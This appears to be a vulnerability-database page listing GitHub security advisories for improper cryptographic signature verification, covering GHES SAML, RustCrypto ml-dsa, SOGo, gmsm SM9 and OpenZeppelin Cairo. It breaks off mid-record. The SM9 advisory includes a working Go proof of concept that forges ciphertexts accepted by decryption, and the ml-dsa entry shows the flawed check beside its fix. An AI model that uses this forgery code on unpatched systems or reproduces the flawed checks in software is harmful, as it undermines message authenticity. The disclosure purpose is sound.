Common Weakness Enumeration

CWE-347

Allowed

Improper Verification of Cryptographic Signature

Abstraction: Base · Status: Draft

The product does not verify, or incorrectly verifies, the cryptographic signature for data.

1128 vulnerabilities reference this CWE, most recent first.

GHSA-5WM9-5344-QRRJ

Vulnerability from github – Published: 2024-08-20 21:30 – Updated: 2024-09-30 21:02
VLAI
Details

An XML signature wrapping vulnerability was present in GitHub Enterprise Server (GHES) when utilizing SAML authentication with specific identity providers. This vulnerability allowed an attacker with direct network access to GitHub Enterprise Server to forge a SAML response to provision and/or gain access to a user with site administrator privileges. Exploitation of this vulnerability would allow unauthorized access to the instance without requiring prior authentication. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.14 and was fixed in versions 3.13.3, 3.12.8, 3.11.14, and 3.10.16. This vulnerability was reported via the GitHub Bug Bounty program.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-6800"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-20T20:15:09Z",
    "severity": "CRITICAL"
  },
  "details": "An XML signature wrapping vulnerability was present in GitHub Enterprise Server (GHES) when utilizing SAML authentication with specific identity providers. This vulnerability allowed an attacker with direct network access to GitHub Enterprise Server to forge a\u00a0SAML response to provision and/or gain access to a user with site administrator privileges. Exploitation of this vulnerability would allow unauthorized access to the instance without requiring prior authentication.\u00a0This vulnerability affected all versions of GitHub Enterprise Server prior to 3.14 and was fixed in versions 3.13.3, 3.12.8, 3.11.14, and 3.10.16. This vulnerability was reported via the GitHub Bug Bounty program.",
  "id": "GHSA-5wm9-5344-qrrj",
  "modified": "2024-09-30T21:02:12Z",
  "published": "2024-08-20T21:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6800"
    },
    {
      "type": "WEB",
      "url": "https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.16"
    },
    {
      "type": "WEB",
      "url": "https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.14"
    },
    {
      "type": "WEB",
      "url": "https://docs.github.com/en/enterprise-server@3.12/admin/release-notes#3.12.8"
    },
    {
      "type": "WEB",
      "url": "https://docs.github.com/en/enterprise-server@3.13/admin/release-notes#3.13.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:U/V:C/RE:H/U:Red",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-5X2R-HC65-25F9

Vulnerability from github – Published: 2026-01-28 16:44 – Updated: 2026-01-28 16:44
VLAI
Summary
ML-DSA Signature Verification Accepts Signatures with Repeated Hint Indices
Details

Affected Crate: ml-dsa
Affected Versions: v0.1.0-rc.2 (and commits since b01c3b7)
Severity: Medium
Reporter: Oren Yomtov (Fireblocks)

Summary

The ML-DSA signature verification implementation in the RustCrypto ml-dsa crate incorrectly accepts signatures with repeated (duplicate) hint indices. According to the ML-DSA specification (FIPS 204 / RFC 9881), hint indices within each polynomial must be strictly increasing. The current implementation uses a non-strict monotonic check (<= instead of <), allowing duplicate indices.

Note: This is a regression bug. The original implementation was correct, but commit b01c3b7 ("Make ML-DSA signature decoding follow the spec (#895)", fixing issue #894) inadvertently changed the strict < comparison to <=, introducing the vulnerability.

Vulnerability Details

Root Cause

The vulnerability is located in the monotonic helper function in ml-dsa/src/hint.rs:

fn monotonic(a: &[usize]) -> bool {
    a.iter().enumerate().all(|(i, x)| i == 0 || a[i - 1] <= *x)
}

The comparison operator <= allows equal consecutive values, meaning duplicate hint indices are not rejected. The correct implementation should use strict less-than (<):

fn monotonic(a: &[usize]) -> bool {
    a.iter().enumerate().all(|(i, x)| i == 0 || a[i - 1] < *x)
}

Regression Analysis

  • Original correct code (commit 1d3a1d1 - "Add support for ML-DSA (#877)"): Used < (strict)
  • Bug introduced (commit b01c3b7 - "Make ML-DSA signature decoding follow the spec (#895)"): Changed to <=

The commit message suggests it was intended to fix issue #894 and make decoding follow the spec, but the change to the monotonic function was in the wrong direction. The other changes in that commit (to use_hint function) may have been correct, but this specific change introduced signature malleability.

Technical Impact

This vulnerability allows signature malleability - the same logical signature can have multiple valid byte-level encodings. An attacker can take a valid signature and create additional "valid" signatures by duplicating hint indices.

Per the ML-DSA specification (FIPS 204, Section 6.2 and Algorithm 26 HintBitUnpack), hint indices must be strictly increasing to ensure a unique, canonical encoding. Accepting non-canonical signatures can lead to:

  1. Signature Malleability: Multiple distinct byte sequences verify as valid for the same message/key pair
  2. Protocol-Level Vulnerabilities: Systems that rely on signature uniqueness (e.g., for transaction deduplication, replay protection, or signature-based identifiers) may be vulnerable
  3. Interoperability Issues: Non-compliant signatures may be rejected by other conforming implementations

Affected Security Levels

All ML-DSA parameter sets are affected: - ML-DSA-44 (NIST Security Level 2) - ML-DSA-65 (NIST Security Level 3) - ML-DSA-87 (NIST Security Level 5)

Proof of Concept

See the file poc_mldsa_repeated_hint.rs for a standalone proof of concept that demonstrates the vulnerability.

The PoC uses test vectors from the Wycheproof test suite that specifically test for this invalid encoding:

  • Test Vector Source: Wycheproof ML-DSA Test Vectors
  • Test Case ID 18: "signature with a repeated hint"
  • Expected Result: invalid
  • Actual Result: valid (BUG)

Remediation

Update the monotonic function in ml-dsa/src/hint.rs to use strict less-than comparison:

fn monotonic(a: &[usize]) -> bool {
    a.iter().enumerate().all(|(i, x)| i == 0 || a[i - 1] < *x)
}

Design Intent: ML-DSA is NOT Intended to Allow Malleability

While some cryptographic libraries intentionally permit signature malleability for compatibility or performance reasons, ML-DSA is explicitly designed to prevent it:

  1. FIPS 204 Specification: ML-DSA is designed to be strongly unforgeable under chosen message attacks (SUF-CMA). This security property explicitly prevents signature malleability.

  2. NIST PQC Forum Discussion: In February 2024, there was a discussion on the NIST PQC forum about potential malleability in ML-DSA's hint unpacking. The consensus was that ML-DSA is intended to be SUF-CMA, meaning any malleability issues should be considered bugs and fixed.

  3. No Documentation of Intentional Malleability: There is no documentation in the RustCrypto ml-dsa crate, FIPS 204, or RFC 9881 suggesting that signature malleability is an acceptable or intentional property.

  4. Regression Bug: The fact that the original implementation had strict ordering (<) and this was changed to non-strict (<=) in a "fix" commit suggests this was an unintentional regression, not a design decision.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "ml-dsa"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.4"
            },
            {
              "fixed": "0.1.0-rc.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-24850"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-28T16:44:47Z",
    "nvd_published_at": "2026-01-28T01:16:15Z",
    "severity": "MODERATE"
  },
  "details": "**Affected Crate:** `ml-dsa`  \n**Affected Versions:** v0.1.0-rc.2 (and commits since `b01c3b7`)  \n**Severity:** Medium  \n**Reporter:** Oren Yomtov (Fireblocks)\n\n## Summary\n\nThe ML-DSA signature verification implementation in the RustCrypto `ml-dsa` crate incorrectly accepts signatures with repeated (duplicate) hint indices. According to the ML-DSA specification (FIPS 204 / RFC 9881), hint indices within each polynomial must be **strictly increasing**. The current implementation uses a non-strict monotonic check (`\u003c=` instead of `\u003c`), allowing duplicate indices.\n\n**Note:** This is a regression bug. The original implementation was correct, but commit `b01c3b7` (\"Make ML-DSA signature decoding follow the spec (#895)\", fixing issue #894) inadvertently changed the strict `\u003c` comparison to `\u003c=`, introducing the vulnerability.\n\n## Vulnerability Details\n\n### Root Cause\n\nThe vulnerability is located in the `monotonic` helper function in `ml-dsa/src/hint.rs`:\n\n```rust\nfn monotonic(a: \u0026[usize]) -\u003e bool {\n    a.iter().enumerate().all(|(i, x)| i == 0 || a[i - 1] \u003c= *x)\n}\n```\n\nThe comparison operator `\u003c=` allows equal consecutive values, meaning duplicate hint indices are not rejected. The correct implementation should use strict less-than (`\u003c`):\n\n```rust\nfn monotonic(a: \u0026[usize]) -\u003e bool {\n    a.iter().enumerate().all(|(i, x)| i == 0 || a[i - 1] \u003c *x)\n}\n```\n\n### Regression Analysis\n\n- **Original correct code** (commit `1d3a1d1` - \"Add support for ML-DSA (#877)\"): Used `\u003c` (strict)\n- **Bug introduced** (commit `b01c3b7` - \"Make ML-DSA signature decoding follow the spec (#895)\"): Changed to `\u003c=`\n\nThe commit message suggests it was intended to fix issue #894 and make decoding follow the spec, but the change to the `monotonic` function was in the wrong direction. The other changes in that commit (to `use_hint` function) may have been correct, but this specific change introduced signature malleability.\n\n### Technical Impact\n\nThis vulnerability allows **signature malleability** - the same logical signature can have multiple valid byte-level encodings. An attacker can take a valid signature and create additional \"valid\" signatures by duplicating hint indices.\n\nPer the ML-DSA specification (FIPS 204, Section 6.2 and Algorithm 26 `HintBitUnpack`), hint indices must be strictly increasing to ensure a unique, canonical encoding. Accepting non-canonical signatures can lead to:\n\n1. **Signature Malleability:** Multiple distinct byte sequences verify as valid for the same message/key pair\n2. **Protocol-Level Vulnerabilities:** Systems that rely on signature uniqueness (e.g., for transaction deduplication, replay protection, or signature-based identifiers) may be vulnerable\n3. **Interoperability Issues:** Non-compliant signatures may be rejected by other conforming implementations\n\n### Affected Security Levels\n\nAll ML-DSA parameter sets are affected:\n- ML-DSA-44 (NIST Security Level 2)\n- ML-DSA-65 (NIST Security Level 3)\n- ML-DSA-87 (NIST Security Level 5)\n\n## Proof of Concept\n\nSee the file [`poc_mldsa_repeated_hint.rs`](https://gist.github.com/orenyomtov/fb4616eb77d33017f41a71b30aa41a04) for a standalone proof of concept that demonstrates the vulnerability.\n\nThe PoC uses test vectors from the Wycheproof test suite that specifically test for this invalid encoding:\n\n- **Test Vector Source:** [Wycheproof ML-DSA Test Vectors](https://github.com/C2SP/wycheproof/blob/master/testvectors_v1/mldsa_44_verify_test.json)\n- Test Case ID 18: \"signature with a repeated hint\"\n- Expected Result: `invalid`\n- Actual Result: `valid` (BUG)\n\n## Remediation\n\nUpdate the `monotonic` function in `ml-dsa/src/hint.rs` to use strict less-than comparison:\n\n```rust\nfn monotonic(a: \u0026[usize]) -\u003e bool {\n    a.iter().enumerate().all(|(i, x)| i == 0 || a[i - 1] \u003c *x)\n}\n```\n\n## Design Intent: ML-DSA is NOT Intended to Allow Malleability\n\nWhile some cryptographic libraries intentionally permit signature malleability for compatibility or performance reasons, **ML-DSA is explicitly designed to prevent it**:\n\n1. **FIPS 204 Specification:** ML-DSA is designed to be strongly unforgeable under chosen message attacks (SUF-CMA). This security property explicitly prevents signature malleability.\n\n2. **NIST PQC Forum Discussion:** In February 2024, there was a discussion on the NIST PQC forum about potential malleability in ML-DSA\u0027s hint unpacking. The consensus was that ML-DSA is intended to be SUF-CMA, meaning any malleability issues should be considered bugs and fixed.\n\n3. **No Documentation of Intentional Malleability:** There is no documentation in the RustCrypto `ml-dsa` crate, FIPS 204, or RFC 9881 suggesting that signature malleability is an acceptable or intentional property.\n\n4. **Regression Bug:** The fact that the original implementation had strict ordering (`\u003c`) and this was changed to non-strict (`\u003c=`) in a \"fix\" commit suggests this was an unintentional regression, not a design decision.",
  "id": "GHSA-5x2r-hc65-25f9",
  "modified": "2026-01-28T16:44:47Z",
  "published": "2026-01-28T16:44:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/RustCrypto/signatures/security/advisories/GHSA-5x2r-hc65-25f9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24850"
    },
    {
      "type": "WEB",
      "url": "https://github.com/RustCrypto/signatures/issues/894"
    },
    {
      "type": "WEB",
      "url": "https://github.com/RustCrypto/signatures/pull/895"
    },
    {
      "type": "WEB",
      "url": "https://github.com/RustCrypto/signatures/commit/400961412be2e2ab787942cf30e0a9b66b37a54a"
    },
    {
      "type": "WEB",
      "url": "https://github.com/RustCrypto/signatures/commit/b01c3b73dd08d0094e089aa234f78b6089ec1f38"
    },
    {
      "type": "WEB",
      "url": "https://csrc.nist.gov/pubs/fips/204/final"
    },
    {
      "type": "WEB",
      "url": "https://datatracker.ietf.org/doc/html/rfc9881"
    },
    {
      "type": "WEB",
      "url": "https://github.com/C2SP/wycheproof"
    },
    {
      "type": "WEB",
      "url": "https://github.com/C2SP/wycheproof/blob/master/testvectors_v1/mldsa_44_verify_test.json"
    },
    {
      "type": "WEB",
      "url": "https://github.com/C2SP/wycheproof/blob/master/testvectors_v1/mldsa_65_verify_test.json"
    },
    {
      "type": "WEB",
      "url": "https://github.com/C2SP/wycheproof/blob/master/testvectors_v1/mldsa_87_verify_test.json"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/RustCrypto/signatures"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ML-DSA Signature Verification Accepts Signatures with Repeated Hint Indices"
}

GHSA-5X58-GQG4-WFVQ

Vulnerability from github – Published: 2022-05-24 19:04 – Updated: 2022-05-24 19:04
VLAI
Details

SOGo 2.x before 2.4.1 and 3.x through 5.x before 5.1.1 does not validate the signatures of any SAML assertions it receives. Any actor with network access to the deployment could impersonate users when SAML is the authentication method. (Only versions after 2.0.5a are affected.)

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-33054"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-06-04T15:15:00Z",
    "severity": "HIGH"
  },
  "details": "SOGo 2.x before 2.4.1 and 3.x through 5.x before 5.1.1 does not validate the signatures of any SAML assertions it receives. Any actor with network access to the deployment could impersonate users when SAML is the authentication method. (Only versions after 2.0.5a are affected.)",
  "id": "GHSA-5x58-gqg4-wfvq",
  "modified": "2022-05-24T19:04:06Z",
  "published": "2022-05-24T19:04:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33054"
    },
    {
      "type": "WEB",
      "url": "https://blogs.akamai.com/2021/06/sogo-and-packetfence-impacted-by-saml-implementation-vulnerabilities.html"
    },
    {
      "type": "WEB",
      "url": "https://github.com/inverse-inc/sogo/blob/master/CHANGELOG.md"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00007.html"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2021/dsa-5029"
    },
    {
      "type": "WEB",
      "url": "https://www.sogo.nu/news.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5XXP-2VRJ-X855

Vulnerability from github – Published: 2026-03-13 16:10 – Updated: 2026-03-16 16:37
VLAI
Summary
SM9 Infinity-Point Ciphertext Forgery Vulnerability
Details

Overview

The current SM9 decryption implementation contains an infinity-point ciphertext forgery vulnerability. The root cause is that, during decryption, the elliptic-curve point C1 in the ciphertext is only deserialized and checked to be on the curve, but the implementation does not explicitly reject the point at infinity.

In the current implementation, an attacker can construct C1 as the point at infinity, causing the bilinear pairing result to degenerate into the identity element in the GT group. As a result, a critical part of the key derivation input becomes a predictable constant. An attacker who only knows the target user's UID can derive the decryption key material and then forge a ciphertext that passes the integrity check.

Impact

The direct impact of this vulnerability is ciphertext forgery, not confidentiality loss.

  • The attacker does not need the master public key, the user's private key, or any other secret material.
  • The attacker only needs to know the target UID to construct a seemingly valid ciphertext.
  • When the recipient invokes the SM9 decryption API, the forged ciphertext decrypts successfully to attacker-chosen plaintext.
  • The C3 integrity check also passes, so this is not merely a format bypass, but a full forgery.

This issue affects the following paths because they all eventually enter the same UnwrapKey logic:

  • sm9.Decrypt
  • sm9.DecryptASN1
  • sm9.UnwrapKey

This means the issue affects not only public-key encryption/decryption, but also key encapsulation/decapsulation.

Severity

This vulnerability should be rated as High.

Using CVSS 3.1 as a reference, it can be characterized as follows:

  • Attack vector: Network
  • Attack complexity: Low
  • Privileges required: None
  • User interaction: None
  • Confidentiality impact: Low or None
  • Integrity impact: High
  • Availability impact: None

Overall, the estimated score falls in the High range, approximately 7.5.

It is High rather than Critical for the following reasons:

  • It does not directly expose private keys and cannot directly decrypt legitimately generated ciphertexts.
  • However, it can reliably break the authenticity and integrity assumptions of decrypted data.
  • In any system that assumes only a legitimate sender can produce ciphertext that decrypts successfully, this is already a serious security failure.

Typical Risk Scenarios

  • An attacker forges a business message that can be successfully decrypted by the target user.
  • The application mistakenly treats successful decryption as evidence that the message came from a legitimate encrypting party.
  • The attacker tricks the recipient into accepting forged instructions, forged notifications, or forged key material.

If a system treats SM9 ciphertext as both confidential and trustworthy in origin, this vulnerability directly breaks that trust assumption.

Root Cause

The root cause is that the implementation does not fully enforce the standard's decryption requirements: C1 must belong to the correct group, and C1 must not be the point at infinity.

It is important to be precise here: the point at infinity is itself a valid element of the elliptic-curve group and is mathematically on-curve. That is not the problem. The problem is not that the implementation incorrectly accepts the point at infinity as an on-curve point. Rather, the SM9 decryption procedure must do more than check that C1 is well-formed and on the curve; it must also explicitly reject C1 when it equals the group identity element O.

The current code only checks:

  • Whether C1 can be successfully deserialized
  • Whether C1 is on the curve

But it is missing:

  • C1 != O (the point at infinity)

In other words, the issue is not that the on-curve check is wrong, but that the implementation omits the additional rejection of the group identity element. That omission is what makes the attack possible.

Vulnerability recurrence

The overall process is as follows: 1. XOR the target plaintext with key[:len(plaintext)] to obtain C2. 2. Calculate C3 = SM3(C2 || key[len(plaintext):]), which involves concatenating C2 with the latter part of the key and then computing the SM3 hash. 3. Construct the ciphertext as ciphertext = C1 || C3 || C2, which means concatenating C1, C3, and C2 to form the final ciphertext. 4. Call sm9.Decrypt(userKey, uid, ciphertext, sm9.DefaultEncrypterOpts) for decryption. 7. Note that the PoC code did not use userKey when constructing the ciphertext. Therefore, if the decryption is successful and the target plaintext is obtained, it proves that the attack was successful.

package sm9_test

import (
    "bytes"
    "crypto/rand"
    "testing"

    "github.com/emmansun/gmsm/internal/sm9/bn256"
    "github.com/emmansun/gmsm/sm3"
    "github.com/emmansun/gmsm/sm9"
)

func TestInfinityPointCiphertextForgeryPublicAPI(t *testing.T) {
    masterKey, err := sm9.GenerateEncryptMasterKey(rand.Reader)
    if err != nil {
        t.Fatal(err)
    }
    hid := byte(0x01)
    uid := []byte("victim@example.com")

    userKey, err := masterKey.GenerateUserKey(uid, hid)
    if err != nil {
        t.Fatal(err)
    }

    plaintext := []byte("forged-without-public-encryption")

    c1 := make([]byte, 64)
    gtIdentity := new(bn256.GT).SetOne()

    var kdfInput []byte
    kdfInput = append(kdfInput, c1...)
    kdfInput = append(kdfInput, gtIdentity.Marshal()...)
    kdfInput = append(kdfInput, uid...)

    key1Len := len(plaintext)
    forgeKey := sm3.Kdf(kdfInput, key1Len+sm3.Size)

    c2 := make([]byte, key1Len)
    for i := range c2 {
        c2[i] = plaintext[i] ^ forgeKey[i]
    }

    hash := sm3.New()
    hash.Write(c2)
    hash.Write(forgeKey[key1Len:])
    c3 := hash.Sum(nil)

    forgedCiphertext := make([]byte, 0, 64+32+key1Len)
    forgedCiphertext = append(forgedCiphertext, c1...)
    forgedCiphertext = append(forgedCiphertext, c3...)
    forgedCiphertext = append(forgedCiphertext, c2...)

    recovered, err := sm9.Decrypt(userKey, uid, forgedCiphertext, sm9.DefaultEncrypterOpts)
    if err != nil {
        t.Fatalf("public Decrypt rejected forged ciphertext: %v", err)
    }

    if !bytes.Equal(recovered, plaintext) {
        t.Fatalf("plaintext mismatch: got %q, want %q", string(recovered), string(plaintext))
    }

    t.Logf("VULN_CONFIRMED: sm9.Decrypt accepted forged ciphertext, recovered=%q", string(recovered))
}

Output: VULN_CONFIRMED: sm9.Decrypt accepted forged ciphertext, recovered="forged-without-public-encryption"

Remediation

In the shared UnwrapKey path used by both SM9 decryption and decapsulation, add an explicit rejection of the point at infinity after Unmarshal and IsOnCurve succeed.

Conceptually:

if p.IsInfinity() {
    return nil, ErrDecryption
}

After the fix, unit tests should be added to ensure that:

  • An all-zero C1 is rejected
  • The raw ciphertext path rejects the forged input
  • The ASN.1 ciphertext path rejects the forged input
  • UnwrapKey also rejects the forged input
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/emmansun/gmsm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.41.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32614"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T16:10:12Z",
    "nvd_published_at": "2026-03-16T14:19:39Z",
    "severity": "CRITICAL"
  },
  "details": "## Overview\n\nThe current SM9 decryption implementation contains an infinity-point ciphertext forgery vulnerability. The root cause is that, during decryption, the elliptic-curve point C1 in the ciphertext is only deserialized and checked to be on the curve, but the implementation does not explicitly reject the point at infinity.\n\nIn the current implementation, an attacker can construct C1 as the point at infinity, causing the bilinear pairing result to degenerate into the identity element in the GT group. As a result, a critical part of the key derivation input becomes a predictable constant. An attacker who only knows the target user\u0027s UID can derive the decryption key material and then forge a ciphertext that passes the integrity check.\n\n## Impact\n\nThe direct impact of this vulnerability is ciphertext forgery, not confidentiality loss.\n\n- The attacker does not need the master public key, the user\u0027s private key, or any other secret material.\n- The attacker only needs to know the target UID to construct a seemingly valid ciphertext.\n- When the recipient invokes the SM9 decryption API, the forged ciphertext decrypts successfully to attacker-chosen plaintext.\n- The C3 integrity check also passes, so this is not merely a format bypass, but a full forgery.\n\nThis issue affects the following paths because they all eventually enter the same `UnwrapKey` logic:\n\n- `sm9.Decrypt`\n- `sm9.DecryptASN1`\n- `sm9.UnwrapKey`\n\nThis means the issue affects not only public-key encryption/decryption, but also key encapsulation/decapsulation.\n\n## Severity\n\nThis vulnerability should be rated as High.\n\nUsing CVSS 3.1 as a reference, it can be characterized as follows:\n\n- Attack vector: Network\n- Attack complexity: Low\n- Privileges required: None\n- User interaction: None\n- Confidentiality impact: Low or None\n- Integrity impact: High\n- Availability impact: None\n\nOverall, the estimated score falls in the High range, approximately 7.5.\n\nIt is High rather than Critical for the following reasons:\n\n- It does not directly expose private keys and cannot directly decrypt legitimately generated ciphertexts.\n- However, it can reliably break the authenticity and integrity assumptions of decrypted data.\n- In any system that assumes only a legitimate sender can produce ciphertext that decrypts successfully, this is already a serious security failure.\n\n## Typical Risk Scenarios\n\n- An attacker forges a business message that can be successfully decrypted by the target user.\n- The application mistakenly treats successful decryption as evidence that the message came from a legitimate encrypting party.\n- The attacker tricks the recipient into accepting forged instructions, forged notifications, or forged key material.\n\nIf a system treats SM9 ciphertext as both confidential and trustworthy in origin, this vulnerability directly breaks that trust assumption.\n\n## Root Cause\n\nThe root cause is that the implementation does not fully enforce the standard\u0027s decryption requirements: C1 must belong to the correct group, and C1 must not be the point at infinity.\n\nIt is important to be precise here: the point at infinity is itself a valid element of the elliptic-curve group and is mathematically on-curve. That is not the problem. The problem is not that the implementation incorrectly accepts the point at infinity as an on-curve point. Rather, the SM9 decryption procedure must do more than check that C1 is well-formed and on the curve; it must also explicitly reject C1 when it equals the group identity element O.\n\nThe current code only checks:\n\n- Whether C1 can be successfully deserialized\n- Whether C1 is on the curve\n\nBut it is missing:\n\n- `C1 != O` (the point at infinity)\n\nIn other words, the issue is not that the on-curve check is wrong, but that the implementation omits the additional rejection of the group identity element. That omission is what makes the attack possible.\n\n## Vulnerability recurrence\n\nThe overall process is as follows:\n1. XOR the target plaintext with `key[:len(plaintext)]` to obtain `C2`.\n2. Calculate `C3 = SM3(C2 || key[len(plaintext):])`, which involves concatenating `C2` with the latter part of the key and then computing the SM3 hash.\n3. Construct the ciphertext as `ciphertext = C1 || C3 || C2`, which means concatenating `C1`, `C3`, and `C2` to form the final ciphertext.\n4. Call `sm9.Decrypt(userKey, uid, ciphertext, sm9.DefaultEncrypterOpts)` for decryption.\n7. Note that the PoC code did not use `userKey` when constructing the ciphertext. Therefore, if the decryption is successful and the target plaintext is obtained, it proves that the attack was successful.\n\n```go\npackage sm9_test\n\nimport (\n\t\"bytes\"\n\t\"crypto/rand\"\n\t\"testing\"\n\n\t\"github.com/emmansun/gmsm/internal/sm9/bn256\"\n\t\"github.com/emmansun/gmsm/sm3\"\n\t\"github.com/emmansun/gmsm/sm9\"\n)\n\nfunc TestInfinityPointCiphertextForgeryPublicAPI(t *testing.T) {\n\tmasterKey, err := sm9.GenerateEncryptMasterKey(rand.Reader)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\thid := byte(0x01)\n\tuid := []byte(\"victim@example.com\")\n\n\tuserKey, err := masterKey.GenerateUserKey(uid, hid)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tplaintext := []byte(\"forged-without-public-encryption\")\n\n\tc1 := make([]byte, 64)\n\tgtIdentity := new(bn256.GT).SetOne()\n\n\tvar kdfInput []byte\n\tkdfInput = append(kdfInput, c1...)\n\tkdfInput = append(kdfInput, gtIdentity.Marshal()...)\n\tkdfInput = append(kdfInput, uid...)\n\n\tkey1Len := len(plaintext)\n\tforgeKey := sm3.Kdf(kdfInput, key1Len+sm3.Size)\n\n\tc2 := make([]byte, key1Len)\n\tfor i := range c2 {\n\t\tc2[i] = plaintext[i] ^ forgeKey[i]\n\t}\n\n\thash := sm3.New()\n\thash.Write(c2)\n\thash.Write(forgeKey[key1Len:])\n\tc3 := hash.Sum(nil)\n\n\tforgedCiphertext := make([]byte, 0, 64+32+key1Len)\n\tforgedCiphertext = append(forgedCiphertext, c1...)\n\tforgedCiphertext = append(forgedCiphertext, c3...)\n\tforgedCiphertext = append(forgedCiphertext, c2...)\n\n\trecovered, err := sm9.Decrypt(userKey, uid, forgedCiphertext, sm9.DefaultEncrypterOpts)\n\tif err != nil {\n\t\tt.Fatalf(\"public Decrypt rejected forged ciphertext: %v\", err)\n\t}\n\n\tif !bytes.Equal(recovered, plaintext) {\n\t\tt.Fatalf(\"plaintext mismatch: got %q, want %q\", string(recovered), string(plaintext))\n\t}\n\n\tt.Logf(\"VULN_CONFIRMED: sm9.Decrypt accepted forged ciphertext, recovered=%q\", string(recovered))\n}\n```\n\n*Output*: VULN_CONFIRMED: sm9.Decrypt accepted forged ciphertext, recovered=\"forged-without-public-encryption\"\n\n\n## Remediation\n\nIn the shared `UnwrapKey` path used by both SM9 decryption and decapsulation, add an explicit rejection of the point at infinity after `Unmarshal` and `IsOnCurve` succeed.\n\nConceptually:\n\n```go\nif p.IsInfinity() {\n    return nil, ErrDecryption\n}\n```\n\nAfter the fix, unit tests should be added to ensure that:\n\n- An all-zero C1 is rejected\n- The raw ciphertext path rejects the forged input\n- The ASN.1 ciphertext path rejects the forged input\n- `UnwrapKey` also rejects the forged input",
  "id": "GHSA-5xxp-2vrj-x855",
  "modified": "2026-03-16T16:37:09Z",
  "published": "2026-03-13T16:10:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/emmansun/gmsm/security/advisories/GHSA-5xxp-2vrj-x855"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32614"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/emmansun/gmsm"
    },
    {
      "type": "WEB",
      "url": "https://github.com/emmansun/gmsm/releases/tag/v0.41.1"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2026-4694"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:L/SI:H/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "SM9 Infinity-Point Ciphertext Forgery Vulnerability"
}

GHSA-626Q-V9J4-MCP4

Vulnerability from github – Published: 2023-02-02 16:59 – Updated: 2024-10-07 21:19
VLAI
Summary
OpenZeppelin Contracts contains Improper Verification of Cryptographic Signature
Details

Cause

is_valid_eth_signature is missing a call to finalize_keccak after calling verify_eth_signature.

Impact

As a result, any contract using is_valid_eth_signature from the account library (such as the EthAccount preset) is vulnerable to a malicious sequencer. Specifically, the malicious sequencer would be able to bypass signature validation to impersonate an instance of these accounts.

Risk

In order to exploit this vulnerability, it is required to control a sequencer or prover since they're the ones executing the hints, being able to inject incorrect keccak results.

Today StarkWare is the only party running both a prover or a sequencer, greatly reducing the risk of exploit.

Patches

The issue has been patched in 0.6.1.

For more information

If you have any questions or comments about this advisory: * Open an issue in the Contracts for Cairo repository * Email us at security@openzeppelin.com

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "openzeppelin-cairo-contracts"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.2.0"
            },
            {
              "fixed": "0.6.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
